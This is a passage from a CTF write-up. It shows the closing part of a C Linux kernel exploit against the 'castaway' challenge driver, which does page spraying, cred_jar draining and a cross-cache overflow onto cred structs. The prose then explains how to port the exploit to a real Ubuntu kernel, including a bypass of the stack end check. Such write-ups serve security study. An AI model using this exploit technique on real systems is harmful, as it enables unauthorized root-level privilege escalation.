        assert(req.idx < INITIAL_PAGE_SPRAY);
        if (req.cmd == ALLOC_PAGE)
        {
            socketfds[req.idx] = alloc_pages_via_sock(4096, 1);
        }
        else if (req.cmd == FREE_PAGE)
        {
            close(socketfds[req.idx]);
        }
        result = req.idx;
        write(sprayfd_parent[1], &result, sizeof(result));
    } while (req.cmd != EXIT_SPRAY);
}

void send_spray_cmd(enum spray_cmd cmd, int idx)
{
    ipc_req_t req;
    int32_t result;

    req.cmd = cmd;
    req.idx = idx;
    write(sprayfd_child[1], &req, sizeof(req));
    read(sprayfd_parent[0], &result, sizeof(result));
    assert(result == idx);
}

void alloc_vuln_page(int fd, full_page *arr, int page_idx)
{
    assert(!arr[page_idx].in_use);
    for (int i = 0; i < ISO_SLAB_LIMIT; i++)
    {
        long result = alloc(fd);
        if (result < 0)
        {
            perror("allocation error");
            exit(-1);
        }
        arr[page_idx].idx[i] = result;
    }
    arr[page_idx].in_use = true;
}

void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz)
{
    assert(arr[page_idx].in_use);
    for (int i = 0; i < ISO_SLAB_LIMIT; i++)
    {
        long result = edit(fd, arr[page_idx].idx[i], sz, buf);
        if (result < 0)
        {
            perror("free error");
            exit(-1);
        }
    }
}

int main(int argc, char **argv)
{
    int fd = open("/dev/castaway", O_RDONLY);
    if (fd < 0)
    {
        perror("driver can't be opened");
        exit(0);
    }

    // for communicating with spraying in separate namespace via TX_RINGs
    pipe(sprayfd_child);
    pipe(sprayfd_parent);

    puts("setting up spray manager in separate namespace");
    if (!fork())
    {
        unshare_setup(getuid(), getgid());
        spray_comm_handler();
    }

    // for communicating with the fork later
    pipe(rootfd);

    char evil[CHUNK_SIZE];
    memset(evil, 0, sizeof(evil));

    // initial drain
    puts("draining cred_jar");
    for (int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++)
    {
        pid_t result = fork();
        if (!result)
        {
            just_wait();
        }
        if (result < 0)
        {
            puts("fork limit");
            exit(-1);
        }
    }

    // buddy allocator massage
    puts("massaging order 0 buddy allocations");
    for (int i = 0; i < INITIAL_PAGE_SPRAY; i++)
    {
        send_spray_cmd(ALLOC_PAGE, i);
    }
    for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2)
    {
        send_spray_cmd(FREE_PAGE, i);
    }

    for (int i = 0; i < FORK_SPRAY; i++)
    {
        pid_t result = __clone(CLONE_FLAGS, &check_and_wait);
        if (result < 0)
        {
            perror("clone error");
            exit(-1);
        }
    }

    for (int i = 0; i < INITIAL_PAGE_SPRAY; i += 2)
    {
        send_spray_cmd(FREE_PAGE, i);
    }

    *(uint32_t*)&evil[CHUNK_SIZE-0x6] = 1;

    // cross cache overflow
    puts("spraying cross cache overflow");
    for (int i = 0; i < FINAL_PAGE_SPRAY; i++)
    {
        alloc_vuln_page(fd, isolation_pages, i);
        edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE);
    }

    puts("notifying forks that spray is completed");
    write(rootfd[1], evil, FORK_SPRAY);
    sleep(100000);
    exit(0);
}

Congratulations to kylebot and pql for taking first and second blood respectively during the competition! Kylebot did not target the cred struct - he cross-cached onto seq_file objects for an arbitrary read to leak driver addresses and an arbitrary free against castaway_arr to build UAF and arbitrary write primitives. pql did target the cred struct with a cross-cache overflow, but in a different and more stable way. His exploit relied on setuid, which triggers prepare_creds and allocates cred objects to prepopulate cred_jar slabs. This way, the exploit can trigger allocations of such pages without much noise and then fork to retake them. I personally never expected that function to allocate these objects, as I thought it would just run permission checks and mutate in place, but it seems the lesson here is to always check the source. Overall, there was a notion beforehand among solvers (and other kernel pwners I talked with) that targeting cred structs in a cross-cache overflow scenario would be quite difficult, if not nearly impossible, so it is quite nice to see it come to fruition.

After the CTF, I was curious whether this technique is applicable to a real Linux system that isn't just a minimalistic busybox setup. To test, I set up a single-core default Ubuntu HWE 20.04 server VM with 4 GB of RAM and KVM enabled. Surprisingly, upon testing the exploit on this system with the drivers loaded, only two changes were required.

For one, I had to increase the FINAL_PAGE_SPRAY macro to 50, which makes sense as this setup is an actual Linux distro with more moving parts. The other change was to account for Ubuntu's CONFIG_SCHED_STACK_END_CHECK kernel option. Since many of my overflows wrote into kernel stacks, the payload would cause this stack end check to fail. The check is just this macro:

#define task_stack_end_corrupted(task) \
        (*(end_of_stack(task)) != STACK_END_MAGIC)

STACK_END_MAGIC is the 4-byte value 0x57AC6E9D. Our payload will just include this value instead of 1, as it is still a valid (nonzero) value for the usage field.

With those changes, we can achieve a working exploit against the CTF challenge driver with this technique on a real distro. The success rate is around 50%, but consider that I barely adjusted anything from the original spray I used - more fine-grained tuning would have led to a better success rate.

As for a multicore setup, the isolated slab of 512-byte chunks was backed by an order-1 page there. This would require re-designing the spray (and setting core affinity due to per-CPU SLUB lists), but I hypothesize that the technical concept should still hold.

Anyways, I think this is a really cool kernel exploit technique - leakless, data-only, all the pwn buzzwords! A huge thanks must also go to D3v17 and Markak for providing feedback on this writeup beforehand. Feel free to inform me if there are any confusing explanations or incorrect information in this writeup, and do let me know if you manage to use this technique in a real world exploit!

Addendum: I originally wrote most of this immediately after corCTF 2022, but decided to post after Defcon 2022 due to time constraints as I was attending the CTF and the convention (shoutout to the All Roads Lead to GKE's Host presentation from StarLabs that talked about cross cache in great depth too!). During Defcon, 0xTen mentioned to me Markak's presentation on DirtyCred at Blackhat a week earlier, which demonstrated another novel approach to attack cred structs in scenarios of UAF/double-free/arbitrary-free via cross cache and has been successfully tested on older CVEs. I guess this cross cache technique has truly revived cred objects as a viable target for exploitation in the most common classes of memory safety bugs 😎